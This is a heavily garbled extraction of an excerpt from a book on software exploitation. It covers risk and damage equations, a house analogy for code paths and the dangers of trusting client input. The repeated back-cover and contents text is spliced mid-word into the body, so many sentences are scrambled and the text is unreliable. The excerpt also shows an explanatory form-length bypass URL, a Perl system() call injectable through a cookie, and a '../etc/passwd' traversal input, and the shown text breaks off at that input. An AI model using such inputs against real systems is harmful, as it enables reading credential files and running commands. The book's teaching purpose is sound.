Expl oit ing How tto e ak Flaws andSoftw bugasrelead o Br r isk ; hCode ow ev er, risk s ar e not ex ploit s. Risk s capt ur e t h e pr obab ilit y t hat a Hoglund flaw or , Gar a bu g w ill By Gr eg y McGr awb e ex ploit ed ( our v iew is t hat high, m edium , an d low seem t o w or k bet t er as p aram et ers for t his t han exact num b er s) . Risk s also capt ur e t h e pot ent ial dam age t hatPub w lish ill er: occu r. A vWesley ery h igh risk is n ot only lik ely t o hap pen, b ut is also lik ely t o cause g reat Addison har m . Risk s can b e m anaged by t echnical an d n ont echnical m eans. Soft w ar e r isk Pub Dat e: February 17, 200 4 m anagem ent t akes int o accou nt sof t w ar e r isk s and at t em pt s t o m anage t he r isks I SBN: 0- 20 1- 786 95 -8 app rop riat ely giv en a par t icular sit uat ion. Pages: 51 2

What f ollow s is an abb r ev iat ed t r eat m en t f or m easu rin g sof t w are r isk in an env ir onm en t . Not e t h at u nlike som e app roach es, ou r appr oach does not t ak e int o accoun t a deep un derst an ding of t he at t ack er—only t he t arg et soft w ar e. We ign ore t he p rob lem of cat egor izin g an d descr ibing pot ent ial at t acker s in t his book . Ot her book s pr ov ide a rHow easonab t r eat m ent of assessin g tat h et acker t hr eat p rake ofilesof oft w atar t acker s [ Denn ing, 1 998Why ; Jones d oeslesof t w are br eak ? How do sm e br eak on p ur pose? are et al. , 20 02] int . Th equat ionemws, e pand resen h ir erus e is m eant o measur dam g age to fir ew alls, ruus, siont he detrisk ect ion sy st antt iv soft war e only n ot kt eep in g oute t he bad uy s? soft w ar e assum ingutsed hat tao capab at twar ack e? er exist Of cour here areerno What t ools can be b reaklesoft Th is s. book p rovse, idesif tthe answ s. capab le at t ack er s, t h en t her e is no r isk . Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t .

Damage Potential

This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he Iscr n our t he t arg et softinw ar e is exp and t he fir ewlearn all d oes not ipt km idodel, die t r if eat m en t f ound m any hackloit ingable book s, you w ill abou t hin g t o pr ot ect it fr om at t ack , t he r esu lt is e xt r em e r isk. I t is im por t ant t o under st and t hat r isk in t his sense am ount s only t o t he r isk t hat t he sof t w are will f ail. We do not at t em pt t o m easu re t he v alue ar efailur ex ploit inue t o wbe ser't ious p r oblem or t h eWhy costsof of t twhat e. I w n ill ot con her tw or ds, ea don t ell you h ow m uch you r st olen dat ab ase w as w or t h. Tr u e risk assessm en t m ust m easur e t he cost of a failur e. I n t his case w e t ak e t he net w or k secur it y r m ech anisms n otinf wor or mat k ion abou t a pot ent ial sof t w are failur e fir st stWhen ep t ow ard classif ying isk—g at her in do g t he bu t n ot calcu lat ing asset x value, p ot en t ial cascad in g failur es, an d dam age cont r ol. At t ack pat t er ns Giv en ou r definit ion s, t he equat ion f or dam age p ot en t ial is Rev er se engineer in g At t ack Pot ency ( giv en) ran ging fr om 1 t o 10 x Classic at t acks ag ainst serv er soft w ar e Tar get Exp osu re ( m easur e or assum e 10 0% ) fr om 0 t o 1. 0 = Sur pr ising at t acks ag ainst clien t soft war e Dam age Pot en t ial ( r esult is in t he r ang e 0 t o 10 ) x 10 Tech niqu es f or cr aft ing m aliciou s inpu t Dam age pot ent ial is a quan t it at ive measur ement . For ex am ple, if an at t ack is rat ed 10 p oin t s The t echn of b fer you ov erar f low s 0% ex posed t o t h e at t ack ( 1. 0 in t he r ange on a scale fr omical 1 t odet 10ails point s uf and e 10 specif ied ) , t hen y our sit e dam age pot ent ial is 1 0 x 10 = 10 0% . Th is m ean s you r asset w ill be Root k it s 10 0% com pr om ised or d est r oyed. Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak Ev ery at t ack has t h e r eal pot ent ial t o creat e d amag e. We assess t h is pot ent ial b y det erm ining soft w ar e. t he pot ency of an at t ack. Hig h- pot en cy at t ack s ar e m or e likely t o cau se n ot iceable p r oblem s w it h applicat ions ( t h at is, t h in gs t h at u ser s can see) . Low - p ot en cy at t acks d o n ot cause not iceable pr oblem s.

Exposure and Potency Anot h er dim en sion, exp osu re, is a m easu re of h ow easy or dif ficult it is t o car r y out an

at t ack . Ex posur e can also be m easu r ed . I f an at t ack is b lock ed at t h e fir ew all, it is said t o hav e low ex posur e. By t est in g t he f ir e w all, w e can m easur e ex posur e for a giv en at t ack . High- p ot ency at t acks, b y defin it ion , cause not iceable pr oblem s w hen t hey do t heir t hing . High- ex posur e at t ack s t hat ar e also high p ot en cy will cause a syst em t o cr ash, b ut t hese k inds of h ig h- p ot en cy at t ack s u su ally in dicat e only t h at t h e fir ewall is not con figu red pr oper ly. That is, t hey can in m any cases b e m it igat ed w it h r eason able fir ew all conf ig ur at ions. •

Table of Content s

•On t he ot herI ndex han d, m edium - exp osu r e at t acks t hat cau se high- p ot ency pr oblems in dicat e a Expl oit ing Softw re How to Br ecom ak Code w eak t ar get t haat is easily pr om ised. By defin it ion , t hese at t ack s ar e not ver y likely t o be By Gr eg Hoglund Garall y McGr aw alone. Thu s t hey m ak e excellent fod der for sof t w ar e exp loit . Hig hst opped by f ir, ew r ules pot ency at t ack p at t ern s t hat hav e m edium - exp osu re dim en sions inclu de au t hent icat ion hij ack , prAddison ot ocolWesley at t ack s, and ex t r em e load sit uat ion s. As w e said , t hese k in ds of at t ack Pubing lish er: onlyPub som et im es can be pr ev en t ed / m it ig at ed u sin g f irew alls, in t r usion d et ect ion, an d ot her Dat e: February 17, 200 4 com mon net w or k secur it y t echn iq ues. But not e t h at t h ese ar e at t ack s t hat cannot be easily I SBN: 0- 20 1- 786 95 -8 pr event ed by a par t icular soft w ar e ap plicat ion because t hey t end t o t ak e adv ant ag e of Pages: 51 2 w eakn esses at t h e com m un icat ion s lev el.

I npu t - dr iv en at t ack s at t he app licat ion lev el ar e usually hig h- exp osu r e at t acks. Th is means t hey easily slip und er t he r adar of st an dar d fir ew all or net w ork - level t echnolog ies. Ther e ar e m any v ar iet ies of t his kind of at t ack . Com m on at t ack pat t er ns in clud e m alfor m ed f ields, m anipu lat ed ut vbr areak iables, anddorepr ion m an ulat Genon er ally speakin g, t h ese How d oes sofinp t w are ? How at t esen ackert at sm ake sofipt w ar eion. br eak p ur pose? Why are kfirinds of atint t ack at t em t oion st ret and m anipulat t he inp ut espace t hinegprout ogrtam ew alls, ru sion detptect sy ch st em s, and ant iv ireus soft war n ot kof eep he .bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. We h ave d escr ib ed t w o imp ort ant var iables t hat can b e m easur ed dur ing r isk assessm ent : exp and . I loaded n ev er y wcase, least of tat hese iables ust e mt ools, easur an ed dt o Ex posu lo i tre in g S opot ft wency a re is it h exat amp les on of er eal t ackvar s, at t ack m pat t erbns, m ake useesofused t he sim ple equat esen t ed t heI f nyex sect det er min in ge act u al t echniqu by bad guy s ion t o brpreak sof t w in ar e. out w antion. t o pBecause rot ect y our sof t w ar fr om vatalues for t hese v ar iables cost s mon ey an d resour ces, a sin gle v ariab le can be measur ed an d t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . used in t h e eq uat ion as long as t h e ot her v ar iab le is assu med t o b e 10 0% . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t

Actual Risk Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem Ev en if y ou ar e 100 % ex posed t o an at t ack , b ut t he at t ack it self does not hin g t o af fect t he secur it yean m ech anisms doisn ot w ornkin r isk analy sis cir cles as im p act . Act ual t ar getWhen , t h ennet t h ew or at tkack is m ingless. Th is k now r isk m easur es t he eff ect of an at t ack w hile at t he sam e t ime con sid er ing t he pot ent ial f or At t ack t er ns dam age. I f t pat h e sof t w ar e is fu lly ex posed t o dat ab ase in ject ion at t ack s, t h e dam age p ot en t ial m ight be 1 00% . But if t h e dat ab ase has no dat a, t he im pact is zer o—t h us t h e act ual r isk is se oun engineer in g ing, " The at t ack is p ossible an d if it w er e car ried out it w ould be zero. Rev Thiseram t s t o say dev ast at in g, b ut t he at t ack is n ot u sef ul because t h e dat abase h as no value. " Classic at t acks ag ainst serv er soft w ar e The equ at ion for act ual r isk is Sur pr ising at t acks ag ainst clien t soft war e Dam age Pot en t ial ( r ange) 0–1 0 x I m pact ( m easur e or assum e 1 00% ) = Act ual Risk x Tech niqu es f or cr aft ing m aliciou s inpu t 10 The t echn ical det ails of b uf fer ov er f low s Measur ing dam age p ot en t ial is fair ly inex pensiv e an d easy because doing so on ly requ ires analy sis of fir ew alls and ot h er lar ge- scale, n et wor k - level f ilt er ing dev ices. A com plet e Root k it s soft w ar e env iron m en t can be analy zed f r om a sing le gat ew ay. Howev er , not e t h at in m any cases firgewall ay iswit not edcon t o cept st ops,app licat lay er t r aff ic suycht oas W eb Ex p lo iat in S o ftor w agat re e is wf illed h conf t h e tigur ools, and knionow ledg e necessar b reak rsoft eq uest s. This is w hen t he secon d eq uat ion kick s in an d r ev eals w h et h er an at t ack p at t ern w ar e. act ually causes any dam ag e. What may com e as a sur pr ise is t hat at t ack pat t er ns t h at ar e gener ically assu m ed t o hav e lit t le or n o d amag e pot ent ial can som et im es end up causin g a gr eat d eal of dam age w hen a p art icular , in divid ual sit e is t est ed . Ou r eq uat ions t ur n out t o be usef ul in pr act ice becau se t hey r ef lect w hat h appens in t h e r eal w or ld . For exam ple, if a high- p ot ency at t ack pat t er n is discov ered, t he sit e dam ag e can clear ly be m it igat ed by r edu cing t h e exp osu re. I n m any cases t his can b e accom plished by add in g a new f ir ew all r ule—a r elat ively inex pensiv e solut ion. Of cour se, st op ping all app licat ion- lev el at t acks at t he fir ew all d oes not scale w ell. A bet t er alt er nat ive is t o f ix t he

app licat ion t o r educe t h e pot ency of an at t ack pat t er n.



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Tour of an Exploit What hap pens w hen a sof t w are p r ogr am is at t ack ed ? We in t rod uce a sim ple hou se analogy t o gu id e y ou t hr ough a sof t w ar e ex ploit . Th e " r oom s" in ou r t ar get sof t w are cor r esp ond t o block s of cod e in t he soft w ar e t h at p er f orm som e f unct ion. The j ob at han d is t o un der st an d •enoug h ab out Table Content t heofr oom s t so w ander t h rou gh t he h ouse at w ill. •

I ndex

Expl ing Softw a re How to Br)e ak Code Eachoitblock of code ( r oom serv es a u niqu e pur pose t o t he pr ogr am. Som e cod e blocks read dat om t he, Gar netywMcGr or k.awI f t hese b lock s ar e r oom s in a hou se and t he at t ack er is st andin g By GraegfrHoglund out side t he door on t he por ch, t hen n et w or k ing cod e can b e t hou ght of as t h e foy er. Such net w or k code w ill be t he f ir st cod e t o ex amin e and r espon d t o a rem ot e at t ack er ' s inpu t . I n Pub lish er: Addison Wesley m ost cases, t h e net w or k cod e m er ely accept s in put and pack ages it in t o a dat a st ream . This Pub Dat e: February 17, 200 4 st r eam is t hen passed deep er int o t he hou se t o m or e comp lex code segm ent s t hat p ar se t he I SBN: 1- 786 dat a. So t h e0- (20 net w or95k-8cod e) f oyer is conn ect ed by int er nal d oorw ay s t o adj acent , m ore Pages: 51 2s. I n t he f oyer , not m uch of in t erest t o our at t ack can be accom plished, b ut com plex room dir ect ly conn ect ed t o t he foy er is a kit chen w it h m an y appliances. We like t he k it ch en , because t he kit chen can , for ex am ple, open files and qu er y d at abases. Th e at t acker 's goal is t o find a pat h t hr oug h t he foy er int o t he k it chen.

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? The Attacker's Viewpoint What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. An at t ack st art s w it h b r eak ing r ules and und er m ining assum pt ions. On e of t he key Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d assu m pt ions t o t est is t h e " imp licit t ru st " assum pt ion. At t acker s w ill alway s b reak an y r ule t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om r elat in g t o w hen, w h er e, and w hat is " allow ed " t o be sub mit t ed as inp ut . For t h e same at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . r easons t hat sof t w ar e bluepr int s are r ar ely mad e, sof t w ar e is only r ar ely sub ject ed t o ext e -"hstave r essbook t est ing, especially st r ess itt est at inveducat olv es pur posefully t ingt he Thisensiv m ust m ay" shock y ou—and willing cert ht ainly e y ou. Get t ingp resen bey ond m alicious in put . The u pshot is t hat user s ar e, for reasons of in herent laziness, t r u st ed by scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t defau lt . An imp licit ly t r ust ed user is t r ust ed t o su pply cor r ect ly f orm ed dat a t hat play by t he r ules and ar e t hu s also imp licit ly " t r ust ed. " Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem To m ak e t h is clear er , w e'll rest at e w hat ' s goin g on . The base assum p t ion w e'll wor k ag ainst is t hat t When r ust ednet user sw not itsupp ly "anisms m alf or med" or w" m s" dat a! On e par t icular for m of t his w or k ill secur y m ech do n ot or aliciou k t r ust in volv es client sof t w ar e. I f clien t sof t w are is wr it t en t o send only cert ain com man ds, At tassu ack pat ns ar e of t en m ade b y t he archit ect s t hat a reasonable u ser w ill only u se t he im plicit mp t er ions client soft w ar e t o access t he ser ver . The issue t h at g oes u n not iced is t hat at t ack er s u su ally see.engineer in gt ack er s can w r it e t heir ow n client sof t w are or hack up an exist ing w r it e Rev sof ter w ar Clev er at client . An at t acker can ( and w ill) cr af t cust om clien t sof t w are cap able of deliv er in g malf orm ed Classic t acks er soft w ear. eTh is is how t h e fab r ic of t ru st un rav els. inpu t on pur p at ose an dag atainst ju st tserv h e right t im Sur pr ising at t acks ag ainst clien t soft war e

WhyTech Trusting niqu es f orUsers cr aft ingIs m Bad aliciou s inpu t Theprt echn ailsexam of b uf fert hat ov ersh f low We n ow esentical a tdet riv ial p le ow ss how im plicit ly t r ust ing a clien t u nr avels. Our exam ple in volv es t he maxsize at t rib ut e of a Hyp er t ex t Mar k up Lan guag e ( HTML) for m . For ms Root k it s ar e a com m on way of quer ying u ser s on a Web sit e for d at a. They ar e used ex t ensively in alm y ot yftpe b ased ion .con Unfor t us,nat ely,knmost Web f or ms exypect o Ex post lo i tever in g S w aofreWebis f illed wit ht r tansact h e t ools, cept and ow ledg e necessar t o b treak rsoft eceive pr oper inpu t . w ar e. The d ev eloper w ho con st r u ct s a f orm has t h e abilit y t o specify t h e m axim um num ber of char act er s t h at a user is allow ed t o sub m it . For ex am ple, t he follow ing cod e limit s t he " user nam e" field t o t en ch ar act er s:

Username •

Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

A d esign o m Wesley isund er st ands t he u nder lying t echnology mig ht assum e t h at a r em ot e u ser Pub lisher er: wh Addison is lim it ed t o su bm it t ing t en ch aract er s in t he n ame f ield . What t hey m igh t not r ealize is Pub Dat e: February 17, 200only 4 t hat t he en for cem ent of field lengt h t ak es place on t he r em ot e user' s m achine, w it hin t he I SBN: 0- 20 1- 786 95 -8 user' s Web br ow ser it self! The pr ob lem is t hat t he r em ot e user migh t h ave a Web br ow ser Pages: 51 2 t hat doesn' t p ay at t ent ion t o t h e size rest r ict ion . Or t h e r em ot e u ser m igh t b uild a m alicious br ow ser t hat has t h is pr opert y ( if t hey ar e an at t acker ) . Or bet t er yet , t he r emot e user mig ht not use a Web b row ser at all. A r em ot e u ser can ju st subm it t he f orm requ est m anually in a specially cr aft ed unif orm resour ce locat or ( URL) : ht t p: /d/oes How v ict im sof/tlogin w are.cgi?u br eakser ? How nam e= do batillt t acker h ecats m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? IWhat n anyt ools case,can t hebe r em ot e t user sh ould most ely not beides t r u st ed,answ and er neit u sed o b reak soft war e?definit Th is book p rov t he s. her should t he r em ot e user ' s sof t w ar e! Ther e is absolut ely not h ing t hat pr ev ent s t he r em ot e user fr om Ex p loiti t ing subm in g aS o URL ft w such a re isas loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om ht p: / /,vyict ser THIatS_I S_W AY_ TOO_carr LONG_ FOR_A_USERNAME at t ack ouimm/ login u st fir.cgi?u st lear n nam h ow e= r eal t acks are really ied ou t. Assu inv book olv ingmtay r ustshock , like yt he one pritesent ak e up et dt oorw ay sond bettwhe een This m pt ustions - h ave ou—and will ed cer there, ainly m educat e ysecr ou. Get ing bey rscr oom t he thou of tlog ic. Ainclev er user se t he " im plicit t r ust "abou doort way t o sneak r ight iptskin id die r eatse m en f ound m any hackcan ing ubook s, you w ill learn t hr ou gh t he f oyer an d in t o t h e kit chen. Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem

LikeWhen a Lock net w Pick or k secur it y m ech anisms do n ot w or k t ack m pat t ercar ns efu lly cr af t at t ack inp ut as dat a t o b e pr esent ed in a par t icular or der . An at tAt acker ust Each bit of dat a in t h e at t ack is like a k ey t hat op en s a code pat h door . Th e com p let e at t ack is engineer g like aRev set er ofsek ey s t h at uinnlock s t h e int er nal code p at hs of t he pr ogr am , on e door at a t im e. Not e t h at t h is set of key s m ust b e used in t he pr ecise or der t hat t hey app ear on t he k ey at t acks aghas ainstb een servused er soft ar est be d iscar ded. I n ot her w or ds, an at t ack m ust chain.Classic An d once a k ey , itwmu include pr esent ing exact ly t h e r ig ht dat a in ex act ly t he r ight or der. I n t h is w ay, ex ploit ing Sur pr ising at t acks ag ainst clien t soft war e soft w ar e is lik e picking locks. Tech niqu es f or cr aft ing m aliciou s inpu t Soft war e is a m at r ix of decisions. The d ecisions t r anslat e int o br anches t h at conn ect block s of code t o one an ot her. Think of t h ese b ran ch es as t he d oor way s t h at conn ect room s. D oors w ill The t echn ical det ails of b uf fer ov er f low s open if t he at t ack er has p laced t he r ight dat a ( t h e key ) in t he righ t or der ( locat ion on t he k ey chain)Root . k it s Som e iof e locat s in wit t h eh pr am mcon ak ecept br anchin d ecisions on yu ser Ex p lo t int he g Scod o ft w a re ision f illed t hogr e t ools, s, andgkn ow ledg ebased necessar t o b- supp reak lied dat a. This is w her e y ou can t r y a k ey. Alt houg h f indin g t h ese code locat ions can be ver y t im esoft w ar e. consum ing, in som e cases t h e pr ocess can be au t om at ed . Figur e 2- 2 d iagr am s t he code br anches of a com m on File Tr ansf er Prot ocol ( FTP) ser v er . Th e gr aph ind icat es w hich br anches ar e b ased on user - supp lied dat a.

Figu r e 2 - 2 . This gr aph i ll ust r a t e s t h e br an ch in g l ogic of a com m on FTP se r ve r . Bl ock s in dicat e cont in uou s code a nd li ne s in dicat e jum p s

a nd cond it i ona l br an ch es b et w e en cod e block s. Bl ock s out lin ed i n bol d i ndi ca t e t h at u se r - su ppl ie d da t a a r e be in g pr ocesse d.



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Gr aphWhy in g of sor e 2- 2t oisbe a pow ful tpool w hen r ev erse eng in eer ing soft he t w ar e texshow ploitnwinill Figur con t inue a sererious r oblem soft w ar e. How ev er , somet im es a m or e sophist icat ed v iew is need ed . Figur e 2- 3 sh ows a m or e sophist icat ed enitsion granisms aph t h atdoalso When nett hwreeor k dim secur y mal ech n ot illum w or kinat es pr ogr am st r uct u re. At t ack pat t er ns Revrer Figu e se 2 -engineer 3 . Thisin ggr aph i s r en de r ed in t hr e e dim e nsi on s. Each code locat ion look s li k e a sm a ll r oom . W e use d t he Ope nGL pa ck ag e t o acks ag ainst serv ert soft e ng t ow ar d a v ul ne r abl e sprintf cal l il luClassic st r at eat tal l t he code pa hs wlearadi in tasoft t arwar g et Sur pr ising at t acks ag ainst clien e pr ogr a m . Tech niqu es f or cr aft ing m aliciou s inpu t [ View full size im age]

The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . I nside par t icular p rog ram room s, d if fer ent p ar t s of a u ser 's r equ est are p r ocessed. Debug ging tThis oolsmcan t o dmetay er shock m ine wy hat sort of pr ocessing is educat being done ert e. e 2- 4t he ust help - h avey ou book ou—and it will cer t ainly e y ou.wh Get ingFigur bey ond show a single code om as, tyou ar get p rog r am. Going by ou r analogy , scr ipts kaiddisassemb die t r eat mly enof t f ound in m any locat hackion ing frbook w ill learn abou t t his cod e appear s in a single r oom in t he house ( one of t he m any b oxes show n in t he ear lier fig ur es) . Th e at t ack er can use inf or mat ion lik e t his t o shape an at t ack , r oom by room . Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k

Figu r e 2 - 4 . Di sa ssem b ly of one " r oom " i n t he t ar g et pr ogr a m . The At t ack pat t er ns code a t t h e t op of t he l ist i ng is a set of p r og r am in st r u ct ions. Th e in st r uct s t h at Rev er sei on engineer in gde a l w i t h use r -sup pli ed da t a ar e cal le d ou t at t h e bot t om of t h e li st in g. Ex ploi t in g sof t w ar e u su a lly i nv olv es Classic t acks serv w arae fl ow in a pr og r am ( e spe ci al ly u se r u nde r statan dinag g ainst bot h h er owsoft dat da t a ) an d h ow da t a a r e pr oce ssed in g iv en code b lock s. Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t

[ View full size im age]

The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

A Simple Example Con sider an ex ploit in w hich t h e at t ack er ex ecu t es a shell comm an d on t h e t ar get sy st em . The p ar t icu lar sof t w ar e bug r esp onsible for cau sin g t h e v ulner abilit y mig ht be a cod e sn ippet like t his: •

Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

$username = ARGV; #user-supplied data system("cat /logs/$username" . ".log");

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What be t uo sed o b reak soft war e? Th p rov et ides he answ s. Not e tthools at t hcan e call t h e tsystem() f un ct ion t akisesbook a p aram er t hat is unercheck ed. Assum e, for t his ex am ple, t hat t he u ser nam e par am et er is deliv er ed f rom an HTTP cookie. The HTTP Ex p lo i tisinag small S o ft wdat a re loaded it h ex amp les ofely r eal t ack s, at pat( tand er ns, an d cookie a is file t hat iswcont r olled ent ir b yatt he r em otteack user is ttools, y pically tstechniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e or ed in a Web br ow ser ) . Sof t w are secur it y- sav v y developer s k now t h at a cookie is fr om at t ack y ou u stshfir st lear are you really ourap t . hically p rot ect and ver ify som et h, in g tm hat ould nevnerh ow b e trreal ust at edt acks ( unless cancarr cr yied pt og it ) . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k ider die t r eat meenex t ploit f oundinint his m any hack bookbecause s, you wun ill tlearn t The v uln abilit y w ex amp leing ar ises ru st edabou cookie d at a ar e b eing passed int o and used in a sh ell com m and . I n m ost sy st em s, shell com man ds h ave som e level of syst em - lev el access, and if a clev er at t ack er su pplies ju st t he righ t sequence of char act ers Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem as t h e " usern ame, " t he at t ack er can issu e comm an ds t h at cont r ol t he syst em . When net w or k secur it y m ech anisms do n ot w or k Let ' s exam ine t h is in a bit m ore d et ail. I f t h e r em ot e u ser t y pes in t he st r ing bracken, corr espond g t toerans nam e, t hen t he r esu lt ing com m and sen t t hr ough t he system() call of ou r At t ackinpat code snipp et w ill be Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s cat /logs/bracken.log Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. This shell com m and displays t he cont ent s of t he f ile br ack en. log in t h e dir ect or y / logs in t he Web br ow ser . I f t he r em ot e user supplies a diff er ent user nam e, such as nosuchuser, t h e r esult in g com m and w ill be

cat /logs/nosuchuser.log



Table of Content s



I ndex

I f t he f ile nosuchuser .log does not exist , a m inor " er ror " occur s an d is repor t ed. No ot her Expl oit ing Softw a re How to Br e ak Code dat a ar e display ed . From t he per spect iv e of an at t ack er , causing a m inor er r or like t his is no By Gr deal, eg Hoglund , Gar y McGr big bu t it does givaw e us an idea. Because w e cont r ol t h e usern ame var iable, w e can insert w hat ev er ch aract er s w e choose as t he user nam e w e sup ply . The shell com m and is fair ly andWesley it un der st an ds lot s of com plex char act er sequences. We can t ake Pubcom lish er:plex Addison adv Pub ant Dat ag ee: of t his f act t o 4hav e some fun . February 17, 200 I SBN: 0- 20 1- 786 95 -8

Let ' s exp lor e w h at hap pens w hen w e supp ly just t he r igh t char act ers in j ust t he r ight or der . Pages: 51 2 Con sider t he fu nny - soun ding usern ame " .. / et c/ passw d. " Th is result s in t he follow in g com man d b ein g r un f or us:

